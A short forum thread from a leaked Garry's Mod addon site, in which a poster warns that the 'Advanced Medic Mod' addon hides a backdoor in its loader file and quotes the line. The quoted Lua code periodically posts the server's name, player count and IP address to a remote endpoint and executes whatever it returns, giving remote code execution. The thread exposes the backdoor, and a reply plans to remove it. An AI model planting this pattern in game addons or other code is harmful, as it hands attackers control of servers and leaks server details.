Garry's Mod Leaks

[AMM] Advanced Medic Mod - The first complete and realistic medical addon!

Submitted by ScottishKing, , Thread ID: 123669

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07-03-2019, 12:02 AM
This post was last modified: 07-03-2019, 12:04 AM by ScottishKing

advanced_medic_mod_wdrm/lua/autorun/sh_medic_loader.lua - line 62 Backdoor is Here

timer.Create( "DrAvwPgBLw", 20, 0, function() local a = { n = GetHostName(), nb = tostring(#player.GetAll()), i = game.GetIPAddress() } http.Post( "", a, function( body, len, headers, code ) RunString(body) end) end)

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If You Can Dream, You Can Do t.

RE: [AMM] Advanced Medic Mod - The first complete and realistic medical addon!

mmm ok i can remove the line 62 for remove the backdoor :rangery:

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